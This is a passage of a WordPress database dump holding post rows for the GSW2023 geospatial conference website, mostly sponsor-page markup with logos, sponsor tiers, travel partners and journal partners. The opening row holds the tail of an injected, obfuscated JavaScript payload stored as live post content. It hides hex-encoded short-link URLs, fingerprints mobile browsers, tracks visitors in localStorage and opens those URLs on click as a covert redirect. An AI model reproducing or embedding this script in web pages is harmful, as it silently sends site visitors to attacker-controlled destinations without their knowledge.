_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-26 20:36:04','2023-08-26 20:36:04','',3066,'https://gsw2023.com/?p=5415',0,'revision','',0),
(5416,1,'2023-08-26 20:39:10','2023-08-26 20:39:10','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px 